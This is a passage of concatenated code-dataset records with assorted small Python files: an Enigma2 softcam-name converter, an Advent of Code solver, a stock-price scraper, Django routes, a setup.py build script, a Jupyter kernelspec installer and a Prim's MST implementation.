ret\n\n","sub_path":"03/hz-longbao/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224618525","text":"from enigma import iServiceInformation\r\nfrom Components.Converter.Converter import Converter\r\nfrom Components.Element import cached\r\nfrom Tools.Directories import fileExists\r\nfrom Poll import Poll\r\nimport os\r\n\r\nfrom enigma import iServiceInformation\r\nfrom Components.Converter.Converter import Converter\r\nfrom Components.config import config\r\nfrom Components.Element import cached\r\nfrom Tools.Directories import fileExists\r\nfrom Poll import Poll\r\nimport os\r\n\r\nclass EmuName(Poll, Converter, object):\r\n\tdef __init__(self, type):\r\n\t\tConverter.__init__(self, type)\r\n\t\tPoll.__init__(self)\r\n\t\tself.poll_interval = 2000\r\n\t\tself.poll_enabled = True\r\n\t\t\r\n\t@cached\r\n\tdef getText(self):\r\n\t\tinfo = \"\"\r\n\t\tinfo2 = \"\"\r\n\t\tcamdname = None\r\n\t\tcardname = None\r\n\t\tcamdlist = None\r\n\t\t# VTI \t\r\n\t\tif fileExists(\"/tmp/.emu.info\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/tmp/.emu.info\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# TS-Panel\r\n\t\telif fileExists(\"/etc/startcam.sh\"):\r\n\t\t\ttry:\r\n\t\t\t\tfor line in open(\"/etc/startcam.sh\"):\r\n\t\t\t\t\tif \"script\" in line:\r\n\t\t\t\t\t\tcamdname = \"%s\" % line.split(\"/\")[-1].split()[0][:-3]\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# BlackHole\t\r\n\t\telif fileExists(\"/etc/CurrentBhCamName\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/CurrentBhCamName\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# Domica\t\r\n\t\telif fileExists(\"/etc/active_emu.list\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/active_emu.list\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t\t\t# OoZooN\r\n\t\telif fileExists(\"/tmp/cam.info\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/tmp/cam.info\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t# Merlin2\t\r\n\t\telif fileExists(\"/etc/clist.list\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/clist.list\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t#Pli\r\n\t\telif fileExists(\"/etc/init.d/softcam\") or fileExists(\"/etc/init.d/cardserver\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/init.d/softcam\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\t\t\ttry:\r\n\t\t\t\tcardname = open(\"/etc/init.d/cardserver\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcardname = None \r\n\t\telif fileExists(\"/etc/.emustart\"):\r\n\t\t\ttry:\r\n\t\t\t\tcamdname = open(\"/etc/.emustart\", \"r\")\r\n\t\t\texcept:\r\n\t\t\t\tcamdname = None\r\n\r\n\t# NFR SoftCam Manager\r\n\t\tif config.NFRSoftcam.actcam.value:\r\n\t\t\tif config.NFRSoftcam.actcam.value != \"none\":\r\n\t\t\t\tcamdlist = config.NFRSoftcam.actcam.value.split()\r\n\r\n\t\tif cardname:\r\n\t\t\tfor line in cardname:\r\n\t\t\t\tinfo2 = \"\"\r\n\t\t\t\tif 'oscam' in line.lower():\r\n\t\t\t\t\tinfo2 = 'oscam'\r\n\t\t\t\telif 'newcs' in line.lower():\r\n\t\t\t\t\tinfo2 = 'newcs'\r\n\t\t\t\telif 'wicard' in line.lower():\r\n\t\t\t\t\tinfo2 = 'wicardd'\r\n\t\t\t\telif 'cccam' in line.lower():\r\n\t\t\t\t\tinfo2 = 'cccam'\r\n\t\t\tcardname.close()\r\n\t\tif camdname:\r\n\t\t\tcamdlist = camdname\r\n\t\tif camdlist:\r\n\t\t\tinfo = 'unknow'\r\n\t\t\tfor line in camdlist:\r\n\t\t\t\tif 'mgcamd' in line.lower() and 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscammgcamd'\r\n\t\t\t\t\tbreak\r\n\t\t\t\tif 'cccam' in line.lower() and 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscamcccam'\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif 'mgcamd' in line.lower():\r\n\t\t\t\t\tinfo = 'mgcamd'\r\n\t\t\t\telif 'oscam' in line.lower():\r\n\t\t\t\t\tinfo = 'oscam'\r\n\t\t\t\telif 'wicard' in line.lower():\r\n\t\t\t\t\tinfo = 'wicardd'\r\n\t\t\t\telif 'cccam' in line.lower():\r\n\t\t\t\t\tinfo = 'cccam'\r\n\t\t\t\telif 'camd3' in line.lower():\r\n\t\t\t\t\tinfo = 'camd3'\r\n\t\t\t\telif 'evocamd' in line.lower():\r\n\t\t\t\t\tinfo = 'evocamd'\r\n\t\t\t\telif 'newcs' in line.lower():\r\n\t\t\t\t\tinfo = 'newcs'\r\n\t\t\t\telif 'rqcamd' in line.lower():\r\n\t\t\t\t\tinfo = 'rqcamd'\r\n\t\t\t\telif 'gbox' in line.lower():\r\n\t\t\t\t\tinfo = 'gbox'\r\n\t\t\t\telif 'mpcs' in line.lower():\r\n\t\t\t\t\tinfo = 'mpcs'\r\n\t\t\t\telif 'sbox' in line.lower():\r\n\t\t\t\t\tinfo = 'sbox'\r\n\t\tif camdname:\r\n\t\t\tcamdname.close()\r\n\t\treturn info2 + info\r\n\r\n\ttext = property(getText)\r\n\r\n\tdef changed(self, what):\r\n\t\tConverter.changed(self, (self.CHANGED_POLL,))\r\n","sub_path":"usr/lib/enigma2/python/Components/Converter/MaggyEmuName.py","file_name":"MaggyEmuName.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"426661724","text":"import re\nfrom collections import namedtuple\nOrder = namedtuple('Order', ['type', 'x_start', 'y_start', 'x_end', 'y_end'])\n\ndef setup_input(file_loc):\n orders = []\n with open(file_loc) as f:\n r = re.compile(r'(turn on|turn off|toggle) (\\d+),(\\d+) through (\\d+),(\\d+)')\n for line in f:\n s = r.search(line)\n orders.append(Order(s.group(1), int(s.group(2)), int(s.group(3)),\n int(s.group(4)), int(s.group(5))))\n return orders\n\ndef part1(file_loc):\n grid = []\n for _ in range(1000):\n grid.append([False] * 1000)\n orders = setup_input(file_loc)\n for order in orders:\n for i in range(order.x_start, order.x_end + 1):\n for j in range(order.y_start, order.y_end + 1):\n if order.type == 'turn on':\n grid[i][j] = True\n elif order.type == 'turn off':\n grid[i][j] = False\n else:\n grid[i][j] = not grid[i][j]\n return sum(sum(row) for row in grid)\n\ndef part2(file_loc):\n grid = []\n for _ in range(1000):\n grid.append([0] * 1000)\n orders = setup_input(file_loc)\n for order in orders:\n for i in range(order.x_start, order.x_end + 1):\n for j in range(order.y_start, order.y_end + 1):\n if order.type == 'on':\n grid[i][j] += 1\n elif order.type == 'off':\n grid[i][j] = max(0, grid[i][j] - 1)\n else:\n grid[i][j] += 2\n return sum(sum(row) for row in grid)\n","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94132174","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\nclass StockDoesNotExistError(Exception):\n pass\n\nclass NetworkError(Exception):\n pass\n\nclass Price:\n '''this class is going to web scrap yahoo finance to get the price\n as well as the current percentage'''\n def __init__(self,symbol):\n try:\n headers={'User-Agent':'Mozilla/5.0'}\n\n network = requests.get(f\"https://finance.yahoo.com/quote/{symbol}/history\",headers=headers)\n except:\n raise NetworkError()\n if network.status_code == 302:\n raise StockDoesNotExistError(symbol)\n\n self.soup = bs(network.content, 'html5lib')\n if self.soup.find(\"span\",attrs={\"data-reactid\":\"32\"}) is not None:\n if self.soup.find(\"span\",attrs={\"data-reactid\":\"32\"}).text == f\"No results for '{symbol.lower()}'\":\n raise StockDoesNotExistError(symbol)\n if self.soup.find(\"span\", attrs={\"data-reactid\": \"6\"}) is not None:\n if self.soup.find(\"span\", attrs={\"data-reactid\": \"6\"}).text == f\"Symbols similar to '{symbol.lower()}'\":\n raise StockDoesNotExistError(symbol)\n self.symbol = symbol\n # print(symbol)\n \n\n def Price(self):\n '''the purpose of this method is to get the current price'''\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"50\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"46\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n price = self.soup.find('span', attrs={\"data-reactid\":\"46.69\"}).text\n self.current_price = float(price.split(\" \")[0]\n .replace(\",\",\"\")\n .replace(\"(\",\"\")\n .replace(\")\",\"\")\n .replace(\"%\",\"\"))\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n def percentage(self):\n '''this method will allow the user to view the current stock percentage'''\n try:\n percentage = self.soup.find('span', attrs={\"data-reactid\": \"51\"}).text\n self.current_percentage = float(percentage.split(\" \")[0]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n self.total_percentage = float(percentage.split(\" \")[1]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n try:\n percentage = self.soup.find('span', attrs={\"data-reactid\": \"47\"}).text\n self.current_percentage = float(percentage.split(\" \")[0]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n self.total_percentage = float(percentage.split(\" \")[1]\n .replace(\",\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"%\", \"\")\n )\n return\n except AttributeError as error:\n raise StockDoesNotExistError(self.symbol) from error\n def driver(self):\n '''this will make it so the class can be automated'''\n\n self.Price()\n self.percentage()\n","sub_path":"IslanderStockPrices.py","file_name":"IslanderStockPrices.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410993530","text":"\"\"\"mywebsite1 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home),\n url(r'^page1/$', views.page1),\n url(r'^index/$', views.index),\n url(r'^year/(\\d{4})$', views.page_year), # http://127.0.0.1:8000/year/2015\n url(r'^date/(\\d{4})/(\\d+)/(\\d+)$', views.date), # http://127.0.0.1:8000/date/2015/1/25\n url(r'^birthday/(\\d{4})/(\\d{1,2})/(\\d{1,2})$', views.birthday), # http://127.0.0.1:8000/birthday/2015/01/3\n # url(r'^students/(?P\\w+)/(?P\\d{1,2})$', views.students),\n url(r'^students/$', views.students, {'name': \"盖伦\", \"age\": '35'}),\n url(r'^goods/(?P\\d+)$', views.goods, {\"shop\": \"无尽之刃\"}),\n url(r'^music/', include('music.urls')),\n]\n","sub_path":"Django/day01/mywebsite1/mywebsite1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470155904","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 15:16:27 2018\n\n@author: neeleshrampal\n\"\"\"\nimport numpy as np\nx='/Users/neeleshrampal/OneDrive/Honours Research/colocation/Cloud_phase_dataset_water_reset1.npy'\ny='/Users/neeleshrampal/OneDrive/Honours Research/colocation/Cloud_phase_dataset_ice_reset1.npy'\n#x refers to the water dataset, while y refers to the ice dataset\nwater=np.load(x)\nice=np.load(y)\nfigure()\nplot(np.nansum(ice[3,0,0],axis=0))\np=np.nansum(ice[0,0,0],axis=0)/np.nansum(ice[0,0,0]+water[0,0,0],axis=0)\n\np_temp=(ice[0,0,0])#number of ice in a event\nclust=np.nansum(ice[0,0,0]+water[0,0,0],axis=1)\nwhere=np.where(clust>0)\np=p[where]\np_temp=p_temp[where]\np_temp2=(ice[0,0,0]+water[0,0,0])#\np_temp2=p_temp2[where]\nsum1=array([p_temp[i,:]**2 for i in range(23825)])\nsum2=array([p_temp2[i,:]*p_temp[i,:] for i in range(23825)])\nsum3=array([p_temp2[i,:]**2 for i in range(23825)])\nse=(len(where[0])/sum(clust))*np.sqrt((np.nansum(sum1,axis=0)-2*p*np.nansum(sum2,axis=0)+np.nansum(sum3,axis=0)*p**2)/(23825*(23825-1)))","sub_path":"code_8th_may.py","file_name":"code_8th_may.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520621559","text":"import aiohttp\nimport json\nfrom config.conf import SEARCH_URL, FILTER_URL, QUERY_LIMIT_MAX\n\n\ndef build_custom_filter():\n cache = {}\n async def build(include_list):\n inc = \";\".join(include_list)\n if inc in cache:\n return cache[inc]\n else:\n default = {\"unsafe\": 'true', \"include\": inc}\n headers = {'content-type': 'application/json'}\n async with aiohttp.ClientSession() as session:\n async with session.post(FILTER_URL, data=json.dumps(default), headers=headers) as resp:\n if resp.status != 200:\n raise Exception(await resp.json())\n response = await resp.json()\n cache[inc] = {'filter': response['items'][0]['filter']}\n return cache[inc]\n return build\n\nfilterBuilder = build_custom_filter()\n\nasync def request(param):\n try:\n data = await build_query_param(param)\n except Exception as e:\n raise Exception(e);\n async with aiohttp.ClientSession() as session:\n async with session.get(SEARCH_URL, params=data) as resp:\n res = await resp.json()\n return res\n\nasync def build_query_param(param):\n default = {'page': 1, 'pagesize': QUERY_LIMIT_MAX, 'site': 'stackoverflow'}\n custom_filter = await filterBuilder(['.page_size', '.total'])\n return {**default, **param, **custom_filter}\n\n\n\n\n\n","sub_path":"SE/SERequest.py","file_name":"SERequest.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59244915","text":"import csv\n\nFILENAME = \"players.txt\"\n\ndef read_players():\n try:\n players = []\n with open(FILENAME, newline=\"\") as file:\n reader = csv.reader(file)\n for row in reader:\n player = {}\n player[\"name\"] = row[0]\n player[\"position\"] = row[1]\n player[\"at_bats\"] = row[2]\n player[\"hits\"] = row[3]\n players.append(player)\n return players\n except FileNotFoundError:\n return None\n\ndef write_players(players):\n with open(FILENAME, \"w\") as file:\n for player in players:\n file.write(player[\"name\"] + \",\")\n file.write(player[\"position\"] + \",\")\n file.write(player[\"at_bats\"] + \",\")\n file.write(player[\"hits\"] + \"\\n\")\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512015625","text":"# BSD 3-Clause License; see https://github.com/jpivarski/awkward-1.0/blob/master/LICENSE\n\nimport os\nimport platform\nimport re\nimport subprocess\nimport sys\nimport shutil\nimport glob\n\nimport distutils.version\nimport setuptools\nimport setuptools.command.build_ext\nfrom setuptools import setup\n\nclass CMakeExtension(setuptools.Extension):\n def __init__(self, name, sourcedir=\"\"):\n setuptools.Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\nclass CMakeBuild(setuptools.command.build_ext.build_ext):\n def run(self):\n try:\n out = subprocess.check_output([\"cmake\", \"--version\"])\n except OSError:\n raise RuntimeError(\"CMake must be installed to build the following extensions: \" + \", \".join(x.name for x in self.extensions))\n\n if platform.system() == \"Windows\":\n cmake_version = distutils.version.LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if cmake_version < \"3.4\":\n raise RuntimeError(\"CMake >= 3.4 is required on Windows\")\n\n for x in self.extensions:\n self.build_extension(x)\n\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=\" + extdir, \"-DPYTHON_EXECUTABLE=\" + sys.executable]\n\n cfg = \"Debug\" if self.debug else \"Release\"\n build_args = [\"--config\", cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{0}={1}\".format(cfg.upper(), extdir), \"-DCMAKE_WINDOWS_EXPORT_ALL_SYMBOLS=TRUE\"]\n if sys.maxsize > 2**32:\n cmake_args += [\"-A\", \"x64\"]\n build_args += [\"--\", \"/m\"]\n\n else:\n cmake_args += [\"-DCMAKE_BUILD_TYPE=\" + cfg]\n\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp)\n subprocess.check_call([\"cmake\", \"--build\", \".\"] + build_args, cwd=self.build_temp)\n subprocess.check_call([\"ctest\", \"--output-on-failure\"], cwd=self.build_temp)\n\n for lib in (glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"libawkward-cpu-kernels-static.*\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"libawkward-static.*\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.so\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.dylib\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.dll\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.exp\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.pyd\"))):\n if os.path.exists(lib):\n os.remove(lib)\n\n for lib in os.listdir(self.build_temp):\n if lib.startswith(\"libawkward-cpu-kernels-static.\") or lib.startswith(\"libawkward-static.\"):\n shutil.copy(os.path.join(self.build_temp, lib), \"awkward1\")\n shutil.move(os.path.join(self.build_temp, lib), os.path.join(extdir, \"awkward1\"))\n\n for lib in os.listdir(extdir):\n if lib.endswith(\".so\") or lib.endswith(\".dylib\") or lib.endswith(\".dll\") or lib.endswith(\".pyd\"):\n shutil.copy(os.path.join(extdir, lib), \"awkward1\")\n shutil.move(os.path.join(extdir, lib), os.path.join(extdir, \"awkward1\"))\n\n if platform.system() == \"Windows\":\n for lib in os.listdir(os.path.join(self.build_temp, cfg)):\n if lib.startswith(\"awkward-cpu-kernels-static.\") or lib.startswith(\"awkward-static.\") or lib.endswith(\".dll\") or lib.endswith(\".exp\") or lib.endswith(\".pyd\"):\n shutil.copy(os.path.join(os.path.join(self.build_temp, cfg), lib), \"awkward1\")\n shutil.move(os.path.join(os.path.join(self.build_temp, cfg), lib), os.path.join(extdir, \"awkward1\"))\n\nsetup(name = \"awkward1\",\n packages = setuptools.find_packages(exclude=[\"tests\"]),\n scripts = [],\n data_files = [(os.path.join(\"awkward1\", \"signatures\"), [x for x in glob.glob(os.path.join(os.path.join(\"awkward1\", \"signatures\"), \"*.xml\")) if x != \"index.xml\" and not x.startswith(\"dir_\") and not x.startswith(\"namespace\")])],\n version = open(\"VERSION_INFO\").read().strip(),\n author = \"Jim Pivarski\",\n author_email = \"pivarski@princeton.edu\",\n maintainer = \"Jim Pivarski\",\n maintainer_email = \"pivarski@princeton.edu\",\n description = \"Development of awkward 1.0, to replace scikit-hep/awkward-array in 2020.\",\n long_description = \"\",\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/jpivarski/awkward1\",\n download_url = \"https://github.com/jpivarski/awkward1/releases\",\n license = \"BSD 3-clause\",\n ext_modules = [CMakeExtension(\"awkward\")],\n cmdclass = {\"build_ext\": CMakeBuild},\n test_suite = \"tests\",\n python_requires = \">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*\",\n install_requires = open(\"requirements.txt\").read().strip().split(),\n tests_require = open(\"requirements-test.txt\").read().strip().split(),\n zip_safe = False,\n classifiers = [\n# \"Development Status :: 1 - Planning\",\n# \"Development Status :: 2 - Pre-Alpha\",\n \"Development Status :: 3 - Alpha\",\n# \"Development Status :: 4 - Beta\",\n# \"Development Status :: 5 - Production/Stable\",\n# \"Development Status :: 6 - Mature\",\n# \"Development Status :: 7 - Inactive\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: MacOS\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Topic :: Scientific/Engineering :: Physics\",\n \"Topic :: Software Development\",\n \"Topic :: Utilities\",\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"169050366","text":"import platform\nimport sys\nfrom argparse import Namespace\nfrom pathlib import Path\nfrom typing import TypeVar, Union\n\nimport docker\nimport rich\n\nfrom dockernel.cli.main import set_subcommand_func, subparsers\nfrom dockernel.kernelspec import (\n InterruptMode,\n Kernelspec,\n ensure_kernelspec_store_exists,\n install_kernelspec,\n user_kernelspec_store,\n)\n\narguments = subparsers.add_parser(\n __name__.split(\".\")[-1],\n help=\"Install dockerized kernel image into Jupyter.\",\n)\narguments.add_argument(\n \"--image-name\",\n help=\"Name of the docker image to use.\",\n default=\"\",\n)\narguments.add_argument(\n \"--list\",\n help=\"show installed kernelspecs\",\n action=\"store_true\",\n)\narguments.add_argument(\n \"--name\",\n help=\"Display name for the kernelspec. \" \"By default, container hostname is used.\",\n default=\"\",\n)\narguments.add_argument(\n \"--language\",\n \"-l\",\n help=\"Language used by the kernel. \"\n \"Makes notebooks written in a given language \"\n \"run on different kernels, that use the same language, \"\n \"if this one is not found. \"\n \"By default, empty value is used.\",\n default=\"\",\n)\n\nDEFAULT_KERNELS_PATH = f\"{sys.prefix}/share/jupyter/kernels\"\narguments.add_argument(\n \"--kernels-path\",\n help=f\"kernels path to install, now env is ' {DEFAULT_KERNELS_PATH} ', see https://jupyter-client.readthedocs.io/en/stable/kernels.html\", # noqa: E501\n default=DEFAULT_KERNELS_PATH,\n)\narguments.add_argument(\n \"--docker-volumes\",\n help=\"same like docker run -v, e.g. '/home/xxx:/home/xxx,/home/a/b:/opt/a/b'\",\n default=\"\",\n)\narguments.add_argument(\n \"--force\",\n help=\"force install\",\n action=\"store_true\",\n)\n\n\nJUPYTER_CONNECTION_FILE_TEMPLATE = \"{connection_file}\"\n\n\ndef python_argv(system_type: str) -> list[str]:\n \"\"\"Return proper command-line vector for python interpreter\"\"\"\n if system_type in {\"Linux\", \"Darwin\"}:\n argv = [\"/usr/bin/env\", \"python\", \"-m\"]\n elif system_type == \"Windows\":\n argv = [\"python\", \"-m\"]\n else:\n raise ValueError(f\"unknown system type: {system_type}\")\n return argv\n\n\ndef _flatten(elems: list[Union[list[str], str]]) -> list[str]:\n res = []\n for elem in elems:\n if isinstance(elem, list):\n for e in elem:\n res.append(e)\n else:\n res.append(elem)\n return res\n\n\ndef generate_kernelspec_argv(\n image_name: str,\n system_type: str,\n docker_volumes: str = \"\",\n) -> list[str]:\n opt_docker_volumes = []\n if docker_volumes:\n opt_docker_volumes = [\n \"-v\",\n docker_volumes,\n ]\n\n dockernel_argv = _flatten(\n [\n \"dockernel\",\n \"start\",\n opt_docker_volumes,\n image_name,\n JUPYTER_CONNECTION_FILE_TEMPLATE,\n ]\n )\n return python_argv(system_type) + dockernel_argv\n\n\ndef image_digest(docker_client: docker.client.DockerClient, image_name: str) -> str:\n image = docker_client.images.get(image_name)\n return image.attrs[\"ContainerConfig\"][\"Hostname\"]\n\n\ndef _show_installed_kernelspecs_by_rich(kernels_path: Path) -> None:\n from rich.table import Table\n\n if kernels_path.exists() and kernels_path.is_dir():\n table = Table(title=\"kernelspec\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"magenta\", no_wrap=True)\n table.add_column(\"Path\", justify=\"left\", style=\"green\")\n\n for k in kernels_path.glob(\"*\"):\n if not k.is_dir():\n continue\n table.add_row(k.name, str(k))\n rich.print(table)\n else:\n rich.print(f\"[red]WARNING[/red]: kernelspec dir not exist? check ' {str(kernels_path)} '!\")\n\n\nT = TypeVar(\"T\")\n\n\ndef _nvl(v: T, default_v: T) -> T:\n if not v:\n return default_v\n if isinstance(v, str):\n if not v.strip():\n return default_v\n return v\n\n\ndef install(args: Namespace) -> int:\n kernels_path_str = args.kernels_path\n if not kernels_path_str:\n raise ValueError(\"--kernels-path must not empty\")\n kernels_path = Path(kernels_path_str)\n\n if bool(args.list):\n _show_installed_kernelspecs_by_rich(kernels_path)\n return 0\n\n system_type = platform.system()\n store_path = user_kernelspec_store(system_type)\n ensure_kernelspec_store_exists(store_path)\n\n docker_volumes: str = args.docker_volumes\n if not docker_volumes:\n docker_volumes = \"\"\n\n image_name: str = _nvl(args.image_name, \"\")\n name: str = _nvl(args.name, \"\")\n if not name and not image_name:\n raise ValueError(\"--image-name or --name must not empty\")\n elif name and not image_name:\n image_name = name\n elif image_name and not name:\n name = image_name\n\n argv = generate_kernelspec_argv(\n image_name,\n system_type,\n docker_volumes=docker_volumes,\n )\n\n language = args.language\n if not language:\n raise ValueError(\"--language must not empty\")\n\n kernelspec = Kernelspec(\n argv,\n name,\n language,\n interrupt_mode=InterruptMode.message,\n )\n\n force = bool(args.force)\n\n # docker_client = docker.from_env()\n # kernel_id = image_digest(docker_client, args.image_name)\n # location = kernelspec_dir(store_path, kernel_id)\n\n location = kernels_path / name\n install_kernelspec(location, kernelspec, force=force)\n # TODO: bare numbered exit statusses seem bad\n return 0\n\n\nset_subcommand_func(parser=arguments, func=install)\n","sub_path":"dockernel/cli/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233998082","text":"type_of_people=10\r\nx=f\"There are {type_of_people} types of people \"\r\nbinary=\"binary\"\r\ndo_not=\"don't\"\r\ny=f\"Those who know {binary} and those who {do_not}.\"\r\nprint(x)\r\nprint(y)\r\nhilarious=False\r\njoke_evaluation=\"Isn't that joke o funny?!{}\"\r\nprint(joke_evaluation.format(hilarious))#format接字符串,必须使用{}\r\nw=\"This is the left side of ...\"\r\ne=\"a string with a right side\"","sub_path":"字符串的连接.py","file_name":"字符串的连接.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"602642862","text":"import sys\r\n\r\nclass Graph():\r\n\r\n def __init__(self, vertices):\r\n self.V = vertices\r\n self.graph = [[0 for column in range(vertices)]\r\n for row in range(vertices)]\r\n\r\n # Imprime el vertice y peso\r\n def printMST(self, parent):\r\n print (\"Edge \\tWeight \\tTotalweight\")\r\n total_Weight = 0\r\n for i in range(1,self.V):\r\n total_Weight = total_Weight + self.graph[i][ parent[i]]\r\n print (parent[i],\"-\",i,\"\\t\",self.graph[i][ parent[i] ],\"\\t\",total_Weight)\r\n\r\n\r\n # Funcion que encuentra el vertice con el valor minimo\r\n def minKey(self, key, mstSet):\r\n\r\n # encuentra el valor minimo\r\n min = sys.maxsize\r\n\r\n for v in range(self.V):\r\n if key[v] < min and mstSet[v] == False:\r\n min = key[v]\r\n min_index = v\r\n\r\n return min_index\r\n # construye el MST usando la matriz de adyacencias\r\n def primMST(self):\r\n #Key escoge el peso minimo en la arista de corte\r\n key = [sys.maxsize] * self.V\r\n parent = [None] * self.V #guarda el MST\r\n key[0] = 0 # si el vetice ya fue seleccionado lo vuelve cero\r\n mstSet = [False] * self.V\r\n parent[0] = -1\r\n\r\n for cout in range(self.V):\r\n\r\n \r\n u = self.minKey(key, mstSet)\r\n mstSet[u] = True\r\n # Actualiza el valor de los vertices adyacentes al vertice elegido\r\n #si la distancia es mas grande que la nueva distancia\r\n\r\n for v in range(self.V):\r\n\r\n if self.graph[u][v] > 0 and mstSet[v] == 